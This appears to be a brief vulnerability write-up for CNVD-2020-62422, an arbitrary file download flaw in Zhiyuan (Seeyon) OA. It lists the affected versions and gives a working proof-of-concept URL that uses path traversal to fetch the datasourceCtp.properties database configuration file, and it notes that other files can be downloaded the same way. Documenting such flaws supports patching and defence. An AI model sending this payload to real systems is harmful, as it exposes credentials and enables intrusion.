Zhiyuan Oa Webmail Do Any File Download Cnvd 2020 62422
Zhiyuan Oa Webmail Do Any File Download Cnvd 2020 62422
Zhiyuan OA webmail.do any file download CNVD-2020-62422
Vulnerability Description
Zhiyuan OA has an arbitrary file download vulnerability, and an attacker can use this vulnerability to download any file to obtain sensitive information.
Vulnerability Impact
Zhiyuan OA A6-V5
Zhiyuan OA A8-V5
Zhiyuan OA G6
Network surveying and mapping
Vulnerability reappears
Verify POC
1
/seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties
The datasourceCtp.properties configuration file will be downloaded in the vulnerable OA system.
Change the parameter filePath to download other files
This post is licensed under CC BY 4.0 by the author.